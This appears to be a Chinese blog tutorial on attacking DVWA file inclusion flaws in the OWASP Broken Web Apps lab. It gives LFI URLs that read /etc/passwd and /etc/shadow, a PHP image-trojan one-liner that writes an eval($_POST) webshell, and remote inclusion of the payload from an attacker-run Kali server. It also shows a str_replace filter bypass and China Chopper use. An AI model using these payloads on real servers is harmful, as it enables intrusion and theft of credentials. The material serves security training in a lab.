文件包含渗透----当我们无法进行上传渗透时另一种黑客攻击

当上传是高安全模式时，我们大可不必非要用上传渗透实现对服务器的攻击，我们可以换一种方式。

1.实验环境

目标靶机：OWASP_Broken_Web_Apps_VM_1.2
下载地址
我们还需要中国菜刀和kali这两个工具，把所有的杀毒软件关了，不然中国菜刀可能会被杀毒软件和谐。
实验原理及危害

文件包含漏洞：即File Inclusion，意思是文件包含（漏洞），是指当服务器开启allow_url_include选项时，就可
以通过php的某些特性函数（include()，require()和include_once()，require_once()）利用url去动态包含文
件，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包
含漏洞与远程文件包含漏洞，远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项（选项开启之后，服务
器允许包含一个远程的文件）。服务器通过php的特性（函数）去包含任意文件时，由于要包含的这个文件来源过滤不
严，从而可以去包含一个恶意文件，而我们可以构造这个恶意文件来达到自己的目的。
1. 文件包含（File Inclusion）即程序通过[包含函数]调用本地或远程文件，以此来实现拓展功能
2. 被包含的文件可以是各种文件格式，而当文件里面包含恶意代码，则会形成远程命令执行或文件上传漏洞
3. 文件包含漏洞主要发生在有包含语句的环境中，例如PHP所具备include、require等包含函数
文件包含分为两类：
本地文件包含LFI（Local File Inclusion） 当被包含的文件在服务器本地时，就形成本地文件包含
远程文件包含RFI（Remote File Inclusion） 当被包含的文件在第三方服务器时，叫做远程文件包含

2.低安全级别渗透

首先我们需要用虚拟机打开目标靶机，并查看ip地址

root@owaspbwa:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:b2:da:ea brd ff:ff:ff:ff:ff:ff
    inet 192.168.13.144/24 brd 192.168.13.255 scope global eth0
    inet6 fe80::20c:29ff:feb2:daea/64 scope link 
       valid_lft forever preferred_lft forever

找到ip后，我们打开网页访问192.168.13.144

1.本地文件包含

访问本地系统账号信息及其它敏感信息
http://192.168.13.144/dvwa/vulnerabilities/fi/?page=/etc/passwd
http://192.168.13.144/dvwa/vulnerabilities/fi/?page=/etc/shadow
http://192.168.13.144/dvwa/vulnerabilities/fi/?page=/etc/php5/apache2/php.ini
http://192.168.13.144/dvwa/vulnerabilities/fi/?page=/etc/mysql/my.cnf
http://192.168.13.144/dvwa/vulnerabilities/fi/?page=/etc/apache2/apache2.conf

这些都是正常的访问：

图片插入一句话工具
因为在上传高安全模式下，我们只能上传图片，所以我们可以利用图片来产生我们需要的小马文件。

1. 制作一句话图片木马 
<?fputs(fopen("yjssjm.php","w"),'<?php eval($_POST[yjssjm]);?>')?>
#yjssjm.php 是我们生成的文件里面写着<?php eval($_POST[yjssjm]);?>
3. 上传图片木马文件
4. 执行文件包含并生成后门
5. 通过菜刀连接webshell
提示：
/var/www/dvwa/hackable/uploads     	#dvwa文件上传访问的目录 
/var/www/dvwa/vulnerabilities/fi     		#dvwa文件包含访问的目录 yjssjm.php

这个时候我们的图片以及是带有木马的图片了。



出来这么一堆乱码，就是成功了。
我们可以去目标靶机OWASP上看一下

地址写的时候，将fi后面的全部去掉，换成你生成的小马的文件名
http://192.168.13.144/dvwa/vulnerabilities/fi/yjssjm.php

2.远程文件包含

建立远程服务器，这里使用kali作为远程服务器，有条件的小伙伴可以使用云服务器。
原理特别简单，我们只需要在远程服务器上创建小马文件，使用远程文件包含，包含到我们这个文件就可以了。
打开kali，默认用户名是root，密码是toor

打开apache
root@kali:~# service apache2 start
root@kali:~# vim /var/www/html/yjssjm.txt   #在网站目录下面创建文件
<?fputs(fopen("yjssjm1.php","w"),'<?php eval($_POST[yjssjm]);?>')?>

访问一下发现apache已经成功启动

打开中国菜刀，同样的操作，这里是yjssjm1.php
http://192.168.13.144/dvwa/vulnerabilities/fi/yjssjm1.php

同样能入侵服务器。

3.中安全级别的渗透

查看源码我们发现增加了远程文件包含的安全性

1.本地文件包含

因为源码只是增加了远程的安全性，所以我们用上面写的低安全性渗透的方法就可以实现了

2.远程文件包含

 <?php
    $file = $_GET['page']; // The page we wish to display 
    // Bad input validation
    $file = str_replace("http://", "", $file);
    $file = str_replace("https://", "", $file);        
?> 
==============================================================
我们仔细看一下这些代码，其实就是如果我匹配到了"http://" 这些字符，那么我就将其替换为空字符
同样如果我匹配到了"https://" 这些字符，那么我就将其替换为空字符
如果我们再去访问下面这个网址
http://192.168.13.144/dvwa/vulnerabilities/fi/?page=http://192.168.13.145/yjssjm.txt
当然是什么都访问不到，因为它默认把我们等号后面的那个"http://"去掉了，即
http://192.168.13.144/dvwa/vulnerabilities/fi/?page=192.168.13.145/yjssjm.txt
这样我们当然会失败，所以我们需要多加一个"http://"
而添加的方法不唯一，下面举个例子
http://192.168.13.144/dvwa/vulnerabilities/fi/?page=hthttp://tp://192.168.13.145/yjssjm.txt
hthttp://tp:// - http:// = http://

只要执行成功，小马文件生成之后，下面的步骤就跟上面的一样了。

你们的评论和点赞是我写文章的最大动力，蟹蟹。